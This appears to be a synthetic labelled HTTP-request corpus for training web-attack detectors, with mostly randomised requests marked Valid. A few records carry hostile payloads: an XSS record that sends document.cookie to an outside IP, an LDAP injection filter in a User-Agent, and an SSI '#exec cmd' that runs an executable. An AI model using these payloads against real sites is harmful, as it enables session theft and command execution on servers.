Expect: 100-continue
From: arin@CIbt.st
If-Modified-Since: Wed, 21 Oct 09 18:47:59 UTC
If-Unmodified-Since: Tue, 16 Aug 05 16:25:09 GMT
If-Match: "vmcMeFa0jAvDI@qLWU9"
If-None-Match: "PxGn6cfL9v6oB4lW48o"
If-Range: *
Max-Forwards: 921
MIME-Version: 6.3
Pragma: bjqiutr=ttaxr5
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: NTLM TnNIZ3J0ZWthb0VUMnQ0bmJzaGtubmFvTm02Tm5TZWM4bzhlRXNwY3Rkbw==
Range: 3666-92,-7
Referer: http://www.ffpe.com/poDibLAj/sEF3nn7f.avi
TE: trailers,chunked
Trailer: Connection
User-Agent: uaoo (qo6Lmkc; riJBPs6)
UA-CPU: StrongARM
UA-Disp: 1867,055,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2031x847
Via: 0.9 www.nkrttDsz.js:8
Transfer-Encoding: identity
Upgrade: emf/6.5
Warning: 653 122.96.172.210:981 "ulzwtrnh" "Fri, 28 Dec 07 03:17:39 UTC"
X-Forwarded-For: 165.100.124.216
X-Serial-Number: 84453733272881684848
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19626
Start - Id: 9568
class: Valid
GET /jm5/o_3IvCx3mLPd/SeDbgsoundh-/NMcmPuyrslJab/i6ertnxtreoe17rx/nYU7URDOsock_streamftp4LvC0/brpt/rmlogTMzetcFQ/aJWwTFlGBO/benrypdMrs8hoahmrEz.php4?ese3inPoabieo=iAn&Jltors4Esc=en2tqintnanrho&tsgcanYmMaRt=61343947&.8av=dAJ&N2_P0dv=tpbAOS&v@inR3vbscripthopenPFh=bpassthru%27Uhs%26Vssaa&VwLexecw=ortetotoe+e&SKnHqEDaE=se3c&au=58rper+b7aopi&aeahgis=rtpzE&hem88ep=Ymja4sosxhtba1id&e4enetggji3=db18JY3QOM-&lm0talsituyehge=em&2qDaukowLuuyda0=63478615&sicA=%3Ftg HTTP/1.1
Host: 54.44.108.171
Connection: keep-alive
Accept: audio/*;q=0.7, image/png
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ac2iaP1-wwrnrtsl;q=0.5, qoja0ihs-wBthh;q=0.0, eo4auwm-h, etk-n
Cache-Control: no-store
Client-ip: 21.67.144.205
Cookie: osGaerTry=sT;ytggtihsi=aDVwF8P7QNEf;Rperl34jnodeS=hgneo3 rm wn;iJFlibt4upicopy=8931;etl=i etc3Ni
Cookie2: $Version="795"
Date: Tue, 17 Jul 07 03:35:44 UTC
ETag: W/"N02s2cno3jyZhNoqZ2X"
Expect: 100-continue
From: anp51@cLdyyihltw.st
If-Modified-Since: Thu, 17 Mar 05 14:39:50 UTC
If-Unmodified-Since: Fri, 21 Apr 06 23:13:25 CET
If-Match: "Kq3GZiAOLocv1dDYa5jZ"
If-None-Match: *
If-Range: Mon, 23 Mar 09 21:44:57 UTC
Max-Forwards: 687
MIME-Version: 1.3
Pragma: e5Eettc=nAarlaKu
Proxy-Authorization: NTLM M1J0aGVic3RxdHBodGxsc3RuYW5wZThpcnBkYWhtZnNoZXRuYWhGZWpjYQ==
Authorization: Basic SW9vZTplc3JM
Range: 9-,-049
Referer: /M7t6oal.tiff
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/9.9 (Windows; U; Windows NT 8.3; o6-ze; rv:5.0.1) Gecko/00270951
UA-CPU: x86
UA-Disp: 0673,410,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1124x1179
Via: 9.6 32.70.130.226, HTTP/2.6 www.a9m3uprb.jpg, HTTP/9.8 www.lefilE.gif
Transfer-Encoding: identity
Upgrade: cieU3/2.7, GyBnun/5.1, tnqnu9/1.7, tqe/0.4, m1na/7.4
Warning: 231 19.254.39.239 "wrftls6rer98ry" "Sat, 02 May 09 14:15:54 CET"
X-Forwarded-For: 215.37.23.155
X-Serial-Number: 2426894
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 9568
Start - Id: 1957
class: Valid
GET /kuz9BU8Jnj4lVF/si/5j1FhWhB.ltOnc_WL/8Wv/rE0@fGR8zu/gOjpih/odplmblhnotbeyoiesnw/Hdeaavmnl/bdawU/lZXf._UzvtPFkQBfT6En.bin?msnm=4017&rzEeciiT=1GGCjMcSm&p3=encemMfrb7Nl&fsnoei0cne8me=88300857 HTTP/1.0
Host: www.emNie.it:0852
Connection: hiaer
Accept: text/html;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: yr-8c4a, tat5odo-ievcr;q=0.6, n8-rtsPl, rocir-IGiykuto;q=0.5, q7t1-teeimuc;q=0.3
Cache-Control: min-fresh=2
Client-ip: 93.59.198.99
Cookie: tia=hep;heAmd=passthrundoiemk0cgo6iyee;POlzcoeaoauI=?s;m6U9_f@I=hsrarfzss1
Cookie2: $Version="909"
Date: Tue, 04 May 04 21:52:30 GMT
ETag: "5IM0a8wAua3B.5K8dP"
Expect: 100-continue
From: ebeitt4@hsle.fr
If-Modified-Since: Wed, 04 Mar 09 10:38:29 UTC
If-Unmodified-Since: Tue, 17 Apr 07 05:35:53 UTC
If-Match: "HZkqbjrXlIr3PIgMosH."
If-None-Match: ".CO8ww140kp31HkxkS"
If-Range: Fri, 26 Jun 09 11:26:31 GMT
Max-Forwards: 8
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM bGgwYTFSTW9vdWFFbmFid2F0bjJrc3BzZTRvcGhlSXZlZWJpZG9lZzdFYzFm
Authorization: NTLM SXlhc2JzZG1vbjI5ajJqVGZpRHRzdGl0ZHVhZXl1ZXI=
Range: 0-,-750641
Referer: http://sjbxa.cz/sukgj70/mix7ehu/srvil/cuoiw/nt8hosp.jsp
TE: trailers
Trailer: Date
User-Agent: stalhvui/2.7.7.2
UA-CPU: Sparc
UA-Disp: 702,657,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 668x278
Via: 3.1 www.etne.jpeg:8
Transfer-Encoding: reeh; wbpo=nmxm25n
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 631 229.150.100.176 "toaero" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1957
Start - Id: 23076
class: Valid
GET /timpNi9r/a0stAnRGzsHyE2/copyw0u0i@VtnCou/trTnt/uAbcOtolE.asp?iechmta=sc&ar4cn=9038&9zuObyhpiu6=ne%3Dnieoowcr&xlhrtpieoll4u=09007&eitalo3=tMNsh%7Ecel7ar&tccqc=oenNacohtpE&oSxtS=htpassuh&mifdlohseevyh4i=%25l%7Cue&mlrIre2o=arwsRsw9vu&ct1woI=pth+&W8xk9idIuimgy=0933609&5ig=547553&eiaeurdoact=i6FSc&7e=3106 HTTP/1.0
Host: www.lhnn8Att.com:22226
Connection: fsctnn
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 109.191.160.78
Cookie: insertvaZR_mailUMZP=yclei;tupdateFqrD94=3985;ig7rA=t7pa\insertKppx2w;tesni4enetri=iWNBfsV
Cookie2: $Version="97"
Date: Tue, 13 Apr 04 11:09:25 GMT
ETag: W/"4EaK.gBzaKrlFCDof@"
Expect: 100-continue
From: taxc@cvbh.de
If-Modified-Since: Tue, 03 May 05 06:17:38 GMT
If-Unmodified-Since: Sun, 01 Apr 07 01:04:29 GMT
If-Match: *
If-None-Match: *
If-Range: "5weHhiBDAghl9cNXU"
Max-Forwards: 103
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic VHhlcmluOmV0bnJh
Authorization: Basic dG9hdDg6bHlpbw==
Range: 6188-,51833-880,99424-5215
Referer: /cstsCms/aTba7bo.tar.gz
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: i-EHNpxH http://www.Tnif.net
UA-CPU: MIPS
UA-Disp: 5084,527,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8704x5020
Via: 9.6 www.bnez.jpeg, HTTP/7.2 www.teLrsdO.png:9, 3.4 www.oleldhj.tiff
Transfer-Encoding: identity
Upgrade: D8c/9.2, rfff9/6.0, ios/5.5
Warning: 928 79.197.115.34 "thIpvU9anr5wv2of" 
X-Forwarded-For: 95.86.251.48
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23076
Start - Id: 10005
class: Valid
GET /bQwNkomJPVUyZR8/naapwudnajsl1uho8hnt/9GA4ONLVPdLlg.htm?o4izrzetr=+at&dTkG.=g-i60Koiar&pshoiehhaM=7546984&a9tnaeb=73318166&t4bptwrduoe7a=bshC+2cRlh&hieIc=%25uh+6ChPIxtelnetil&etparfrRe=telnetnha HTTP/1.0
Host: www.eerlbhaol.st
Connection: mneidizo
Accept: */*
Accept-Charset: iso-8859-1;q=0.6, us-ascii, x-mac-arabic;q=0.9, x-mac-korean;q=0.0, cp-950;q=0.5
Accept-Encoding: *
Accept-Language: rc-2y;q=0.6
Cache-Control: no-transform
Client-ip: 177.123.168.57
Cookie: snmSnAo=linkee;uinput7WnullGv1y=2208637;bai70ondlt=988;raul=610602582
Cookie2: $Version="2"
Date: Mon, 08 Dec 08 21:35:23 UTC
ETag: "37Du@YuAnBeW63f@"
Expect: 100-continue
From: 2rbOee@urmb.de
If-Modified-Since: Fri, 09 Jul 04 19:34:54 UTC
If-Unmodified-Since: Mon, 05 Jun 06 07:09:58 UTC
If-Match: "ycegfjxJAOqHnsGOE3OO"
If-None-Match: "wqghPCN_TCaoueGP3.O."
If-Range: *
Max-Forwards: 9919
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest response="943e9DDe890EBB28F536C9D74aABFB0B"
Authorization: Digest opaque="tl3ni"
Range: 7-,1-2,575-73
Referer: http://www.xneaxndN.ch/Iswlceb/eca8p/sttr/caceo.css
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/9.1 (compatible; Konqueror/5.1; Windows NT; nhdotEe)
UA-CPU: x86
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6267x971
Via: 6.1 170.93.70.244, HTTP/6.8 www.kttt.jpeg:82896
Transfer-Encoding: gzip
Upgrade: 2nos5s/7.0
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 54263
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10005
Start - Id: 27148
class: Valid
GET /e-XvwXFbqhEg_15vxd/tttxfhigsavKrSh2nohl.msf?eetseblHna=+s%5Boao4co%2Bu HTTP/1.1
Host: 232.63.176.246
Connection: close
Accept: video/*, audio/basic;q=0.7, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, deflate
Accept-Language: Setj-Tc, mt5mmcsp-rceeu3p;q=0.2
Cache-Control: only-if-cached
Client-ip: 198.90.183.128
Cookie: renceabhtrecl=niE8Twioocsfdnd;BkJW7nQIA=scdnisjg6;T3i=t:e;ite3nhH=vn0;nEhsns0n7A=0779231;tast9rRE=52996
Cookie2: $Version="9"
Date: Fri, 16 Sep 05 10:08:35 GMT
ETag: "EqroVsI170GggWVYKj"
Expect: 100-continue
From: tiqc@jnte.gov
If-Modified-Since: Sat, 26 Jul 08 06:45:50 UTC
If-Unmodified-Since: Sat, 26 Mar 05 04:56:11 CET
If-Match: "tTePC_n2GibXNaxxYTbW"
If-None-Match: *
If-Range: "C_NGDVAJloL6ey5p"
Max-Forwards: 9
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest username="eiadaa"
Authorization: Sgat7y yhhm=tneslp
Range: 876-071,453044-67,-1
Referer: /niksuoti/shne.rar
TE: trailers,chunked
Trailer: Accept
User-Agent: Mozilla/2.5 (X11; U; Linux i386 5.9; dl-28; rv:5.1.0) Gecko/06327734
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 549x140
Via: 5.6 www.tsodn.jpeg, HTTP/9.8 www.ehemwim.tiff, HTTP/6.2 www.xyte.shtml
Transfer-Encoding: identity
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 162.49.222.6
X-Serial-Number: 0352610
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 27148
Start - Id: 8265
class: Valid
GET /ufLeagD8H/eXU.vl0y33h7/efY6/roooiriguE/lH5mSmHVzw8n@3K2tjYS/ofsib7tdadsiyioTae/euhetitntnoeii5.php?moEl=jnnr&ncAataevonr=so6e&mGklWett=nixra%2Fpuh%40NHi%27ht&kf0KTzk6QH=cq6t&ZFpassthruEHetcmwVsuE=formiy&huaaortsae0lu=m9dest3etawrmns&ikboioot=%3EediiNocnax3&sg=tji%40sN&utta2rutnounto4=xtpeieOoato4tstric HTTP/1.1
Host: www.bkJbsenzn.gov:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=71
Client-ip: 2.140.51.225
Cookie: pM4zbsexecG_-G=i9;D60-rIWfS=a1uAFPyd.u3;emNsf=tb2zinclude8tp;is7hnE2=hIthg3atT8ne;aadLidas=services;cae=936
Cookie2: $Version="65"
Date: Sat, 24 Sep 05 02:39:59 GMT
ETag: W/"8J1PQO1TDjIi5xZ3N"
Expect: 100-continue
From: obst2@srgtiust.it
If-Modified-Since: Tue, 20 Dec 05 12:28:14 GMT
If-Unmodified-Since: Sat, 30 Sep 06 10:56:11 UTC
If-Match: "9vqsV@CzYPHFnDM6"
If-None-Match: "_s-iuSsY7W2kBiHFwRn"
If-Range: "0fIb1Jyx2@M6Tx4HD"
Max-Forwards: 2411
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZXNlaDRyaHNiMlNpMDV3YnVodGx1SGkzb2dhc3RpZW5FdHJoYmRyb28=
Authorization: NTLM ZGhzc2lpdG5lZ2lScHNvdHVtc3lpUnROQ2dzaWVsdWVuY2xp
Range: 245681-56,307766-2495,67-9
Referer: http://iejeru.net/qe4bsat/ftveboax/3feeItE/strtfmeq.php3
TE: deflate;q=0.3,deflate;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/6.2 (Windows; U; Windows NT 5.7; de-pp; rv:8.4.2) Gecko/72245926
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 833x678
Via: 0.6 www.wma0.css:559, 7.7 91.221.237.206
Transfer-Encoding: compress
Upgrade: r88e/3.1, eipneG/6.0, tm7/7.0, feaq/2.0, Fat8/9.6
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 19168531568126
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8265
Start - Id: 47837
class: XSS
GET /3UpFYK_d/al/4shsopsr5ito5oth9vdm/0d3qmV3alhraitl/hBM04T@3MEF../6_L8CQKjhttprgDU88.aspx?Oeslsrxt=rticosto&nznydAspdl5b=aVrQw&allWK4um0A=8&r4iyi4DtndaR6b=mbgsoundsvbscriptmmail%29ccwmochalocationoadisw&jnjenb=hs7ukeolrIshtoas9&itehmninwTNk=6884390&YhaHReeii=sEo&liwbh2omn33n5Ap=%3Cimg++++src+%3D++++%22++++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F192.68.150.63%2Feron.mdb%27%2Bdocument.cookie%29%3B%5D++++++%22+++%3E&osnho2w1dys=oBe&edYeaa=%5Bts&ernhdnE=mUXrX9Ux&pn=sAGFGyCY4v HTTP/1.0
Host: www.nerhnh7.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic, iso-8859-2, euc-tw;q=0.7
Accept-Encoding: *
Accept-Language: 2-lmaezik;q=0.2, hats-teeeessB, nesas2-lgppne
Cache-Control: max-stale
Client-ip: 145.49.48.15
Cookie: T7-x3qSps=ccCY0tA6;etn6l4i7ACe=4068
Cookie2: $Version="459"
Date: Wed, 01 Feb 06 01:21:14 GMT
Expect: hnkndi8=thtmdr
From: pMtHteat@h2a4E.de
If-Modified-Since: Tue, 24 Feb 09 07:37:56 CET
If-Unmodified-Since: Mon, 19 Apr 04 13:39:31 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 3518
MIME-Version: 8.7
Pragma: en='du'
Proxy-Authorization: NTLM TDNybjkwYkRubGFlcWlucmU0c2F0ZWNudmd1dHVvbnNzQ1dtenNoZDNtc2U=
Authorization: 0omh a0ocpoA=YS4eu
Referer: http://www.uaTneQ.it/obe9b/eodioX/ftwpdnt/nufe/eadi.jsp
TE: chunked
Trailer: Via
User-Agent: Mozilla/8.8 (Windows; U; WinNT 2.4; rs-aa; rv:6.8.9) Gecko/05185020
Via: 7.7 www.sy2r.jpg, 9.2 167.125.80.246
Transfer-Encoding: gzip
Upgrade: dse/3.9, erre/3.1, jAtMM/7.7, eexzD/7.4
Warning: 297 www.wzsizre.html:14 "rgdedqieE" "Thu, 23 Dec 04 01:45:46 CET"
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47837
Start - Id: 28559
class: Valid
GET /xtermaN/oxzls6kK/rjIxO_/dawadb.cgi?sbt=ynalTes&rs=sXArpJ2vc&o5=16&p.m0=catosR&vargpM=9&8eyKloNeoRe=5247359&uac4dsva=869567&esepnlEEdrkw=%7CoeI&oe7lames=4230220&owgwYCderneimt=twinntrtt HTTP/1.1
Host: 233.60.10.114:8482
Connection: seq8
Accept: audio/x-wav;q=0.2
Accept-Charset: iso-8859-3;q=0.4
Accept-Encoding: 
Accept-Language: otGhy-3srhsel, 4s-eay1i, n7l9fory-S;q=0.8, csrehAan-1AwiEr, 0eaa-o;q=0.6
Cache-Control: yisrD=lana
Client-ip: 72.50.172.162
Cookie: tb7hjsoteaii=odI2Itw;iTmveecvwh=1;Wnafondnlpd8edb=481701
Cookie2: $Version="654"
Date: Fri, 09 Sep 05 09:58:58 UTC
ETag: W/"K45FpoeZ6ZUmyGN"
Expect: nJet=zfrye;nhtj
From: itsrdeii@e8igfye.ch
If-Modified-Since: Tue, 21 Dec 04 14:03:04 UTC
If-Unmodified-Since: Wed, 16 Jan 08 13:37:11 UTC
If-Match: "HeRJfMuMVINymVZjyF60"
If-None-Match: *
If-Range: Wed, 05 Jan 05 08:59:44 UTC
Max-Forwards: 8713
MIME-Version: 4.0
Pragma: yekct='ag'
Proxy-Authorization: Basic c3RyZ3R5bnM6bmEyag==
Authorization: NTLM aWV0ZWtzYUU1cmFydHJyaTZmbm9KdmNBZXNobHRkbnhjbWNiYW9mOG5TbHJpYw==
Range: -485791
Referer: http://www.Bactfsre.cz/Hltwn/eiRkyt/c8aGddL.ace
TE: chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.4 (Windows; U; Win98 3.9; Po-i7; rv:3.9.5) Gecko/00592914
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6545x8948
Via: HTTP/0.2 www.titSo.tiff:7326
Transfer-Encoding: identity
Upgrade: edo/0.1, eotw/1.7
Warning: 943 www.0eTkm.jpeg "vada" "Wed, 23 Jun 04 24:08:28 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28559
Start - Id: 37338
class: LdapInjection
GET /oQcMDbm/otd/5n@lrjA@5/c-HhvbEy2m/hZNrjOeY.0j/eDvb57_I6Ovdg@@ijFbT.dll?n2uirlud=lo&6rsrlsritisHc6e=791945&rrb=2722 HTTP/1.0
Host: www.ip7isu.it:1
Connection: snsxReug
Accept: */*;q=0.4
Accept-Charset: iso-8859-5;q=0.4, iso-8859-5, iso-10646-ucs-2;q=0.8, koi8, iso-8859-15;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: oeodert-mdonaq8
Cache-Control: no-transform
Client-ip: 131.232.136.148
Cookie: nzh4de7erie=e';I5aVoiv=63575;l2UoGzTsystema=8255243;esdetFeosT=9843857181;odmeS=aeecaw;ox6vehueer=6
Cookie2: $Version="264"
Date: Sun, 22 Jan 06 22:40:51 CET
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: ddtp@lesT.org
If-Modified-Since: Mon, 27 Sep 04 19:56:44 GMT
If-Unmodified-Since: Wed, 15 Sep 04 20:55:09 CET
If-Match: *
If-None-Match: *
If-Range: "6xH2@5W0ssXsZjhHKQV"
Max-Forwards: 200
MIME-Version: 7.1
Pragma: acoooar=8fv
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: leaN5 tobtnry7=2diiyo
Range: 54145-,-678850
Referer: http://lSfawel.net/Enssa/moijhal.asp
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: tvte)(&(objectClass    =9l*)
UA-CPU: 68000
UA-Disp: 915,366,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: 9.4 146.147.97.84
Transfer-Encoding: gzip
Upgrade: o3106M/9.9, E9rle4/4.1, oohnne/6.6, eelrde/4.9, Ix7ea/1.8
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 172.124.5.186
X-Serial-Number: 06549032
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37338
Start - Id: 4043
class: Valid
POST /ehbEw/ZPm.osSoFC/sK.vC@VHVhNGzwophd/7nzOgy77T0olA1Ltzt.css? HTTP/1.0
Content-Length: 227
Content-Language: esalql,gl,iin
Content-Encoding: identity
Content-Location: http://www.atbzh.biz/amtsri/ueyfbIma/yn7EEs3/Toen.sh
Content-MD5: dWVhbGEzZWxlYWkxZVRkaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Aug 08 11:55:26 GMT
Last-Modified: Sat, 09 Sep 06 23:21:34 GMT
Host: 99.45.151.97
Connection: close
Accept: application/x-tar;q=0.5
Accept-Charset: x-mac-ce;q=0.7
Accept-Encoding: gzip, gzip;q=0.9, compress, identity, compress;q=0.7
Accept-Language: anea-lnvcpmx;q=0.8, DntestEt-ogs;q=0.6, jnnd-ants, hh-sede;q=0.5, ih1ublns-n
Cache-Control: only-if-cached
Client-ip: 90.81.123.225
Cookie: gepimwtnoldt=c3deoNa8(-;ste=tahl(nc;iws2ttEeus=6;tene=vtcq
Cookie2: $Version="3"
Date: Wed, 15 Feb 06 11:33:18 UTC
ETag: "w0dQAs5W2t3HW7DOu-bw"
Expect: 100-continue
From: eittnis@mfhoIolo.net
If-Modified-Since: Sun, 23 Mar 08 12:48:24 UTC
If-Unmodified-Since: Sun, 28 Feb 10 23:44:19 GMT
If-Match: "ZbNCk@TfNNpJFqfFiU"
If-None-Match: "gJW1V6Owrf@fgJ5xw"
If-Range: Sat, 12 May 07 01:28:31 CET
Max-Forwards: 68
MIME-Version: 4.8
Pragma: a8I0se='tcpb'
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: NTLM Z2xhc2FvZWRpdDhvaHRlblM2NWJwdXRobGVpbGFhb2RuZWNMY2FhZXNybTBn
Range: -67
Referer: http://www.e66nzhOt.de/ebEe/zgoe/qsitrso/Vhry.pdf
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 5.7; af-eQ; rv:7.7.0) Gecko/01049422
UA-CPU: PowerPC
UA-Disp: 055,684,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 333x496
Via: HTTP/6.8 www.toe8s.tiff:7980, HTTP/7.4 www.rdlatawm.html, FTP/2.4 www.osjeo.shtml
Transfer-Encoding: deflate
Upgrade: otieet/8.1, nbupAp/1.1
Warning: 077 170.228.207.137 "0iuylmonu9ff" 
X-Forwarded-For: 201.143.193.53
X-Serial-Number: 8242203190314
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ze=rof Lcrchit&eeEpoe=786741677&4qeexbe8t0o0mc0=36&rihaCahr0ndtegv=ebq&ernatddywim=nt&Rtatis2tmnfpx=tePodheit&1nsifE8tce6tnl=24&rileku=3SS5BM&n2TreptWcrSdbl=laRrbpymlb&V6fDevalSF=kNn&heireiye=jx8QmFJZ&etjedtq=29026&k2BKAV7ik=00

End - Id: 4043
Start - Id: 22981
class: Valid
GET /Nl.jsp?iaAd3U=uhm+c50lexec&6DconnectpmrdWZ_qF=epa0rAKcPXKu&e6sebdcrxogaesr=autoexec%3Er%3Ahhbetweenmafo&ktntDtweNdtbd=npaSdteantsht&gShtbev=uspo1em6eciaaep&7s=+s%28eril HTTP/1.1
Host: www.MjrnbieIaa.org
Connection: nrtds
Accept: */*;q=0.1
Accept-Charset: iso-2022-jp;q=0.7, isiri-3342;q=0.6
Accept-Encoding: gzip
Accept-Language: *;q=0.8
Cache-Control: min-fresh=2
Client-ip: 212.208.180.194
Cookie: hac9S0tjp=6729;lofacjswa=1;sefsmuBmukin=e7C
Cookie2: $Version="1"
Date: Wed, 14 Jan 04 21:53:51 CET
ETag: "EL3Htu2bTUOwkQkRm"
Expect: tshqf
From: 0cecs@ciEoh.gov
If-Modified-Since: Mon, 20 Jul 09 08:57:34 GMT
If-Unmodified-Since: Thu, 25 Mar 10 12:52:06 GMT
If-Match: *
If-None-Match: "RVKP@t3U.8EOzLPqf1X"
If-Range: Mon, 28 May 07 23:04:38 UTC
Max-Forwards: 57
MIME-Version: 6.6
Pragma: u7GtOsn='uo'
Proxy-Authorization: egbhl hseba=ee8aOeii
Authorization: Basic bG1wZWR0YTpzSGNJZw==
Range: 3524-0378,9-
Referer: http://E2nri.net/pfpstths/upzbdbi/tners.pl
TE: trailers
Trailer: Connection
User-Agent: Mozilla/9.7 (Windows; U; Win 9x 4.1; l7-Ax; rv:5.7.3) Gecko/75560905
UA-CPU: x86
UA-Disp: 052,5191,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 465x0327
Via: ofdsr/9.9 140.214.199.41, 1.4 239.31.232.147, FTP/5.5 60.61.39.55
Transfer-Encoding: compress
Upgrade: bae/0.4, hee6y0/8.7, soqh/2.5, sdle8/1.8, bdseN/0.5
Warning: 297 189.212.175.83 "twbyleysalnsa6ctEh" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 22981
Start - Id: 27846
class: Valid
GET /sgrSufefceCrleiehn/esntetesw5nctaw/tswhnYedo/uzriiBwoit.nsf? HTTP/1.1
Host: 67.117.9.32:9
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 253.99.111.142
Cookie: smawauce1injeeu=h'oanisxemetadelete=aboawtt;dadhenEe=bde7tenlors;nnh=n8 a;ndugebRa7ceuua=eby;ionodet=na;utihohaeu=86
Cookie2: $Version="841"
Date: Thu, 22 Feb 07 10:55:34 CET
ETag: "T7R-PajXniYdaIVIMa"
Expect: 100-continue
From: xalea@r7nedo.fr
If-Modified-Since: Tue, 17 May 05 06:58:42 CET
If-Unmodified-Since: Sun, 22 Feb 09 11:35:47 GMT
If-Match: "JopLzwIkSQX3VMyv"
If-None-Match: "f2flgk@2dROi23rd"
If-Range: *
Max-Forwards: 5519
MIME-Version: 6.5
Pragma: ebjau='o5a'
Proxy-Authorization: mkd8c naeroilc=pleeis
Authorization: NTLM c3BpeThoYXRoc3JlcTdac2FzNHN0RWVzZWV1NjV0dXVtcm9z
Range: 239-7
Referer: /mmt3b/hEndm/sfuwihg.nsf
TE: trailers,chunked
Trailer: Referer
User-Agent: rtvitlpan8hd
UA-CPU: 68000
UA-Disp: 904,456,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 741x4792
Via: aTer/2.3 www.4eeraOs.tiff
Transfer-Encoding: gzip
Upgrade: ais8ee/1.3, tiXl/4.0, eploa/7.6, boptsh/6.4, 0tn/9.0
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 216.94.170.227
X-Serial-Number: 92325368257
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27846
Start - Id: 40345
class: SSI
GET /pnrV.gWFzm_rOuwfoObw.asp?oo4hAreux=%3C%21--+++%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5CpnWsma%5Cdetssteo%5Ceatalvq1.exe++d%3A%5Cort%5Cwww.rintmeontr.org%5Csq%5Cdatabase.mdb++++%2Fx++exporttofoxpro%22--%3E&iiTcep=childshhhsEdeolsecroycy&bu4q4enale=lSkokFAXZwl&tn=irO&ioonjrslo0=62149&8tlxsnhn=cdImmpQA6yny&sfottat6o=eulihMechobor+sI%3Ct&rrwriaepf3tbI=80603&aeeEdlowut3wtea=2866&trlIdtutom=%3A+&1ppsd=t&aeataR3tchfi=10vvmz%40-u&tta=rmeiyCtHusro&mNeetog9=t5DtnqeCxt HTTP/1.1
Host: 21.248.238.254
Connection: e3sop
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Language: *
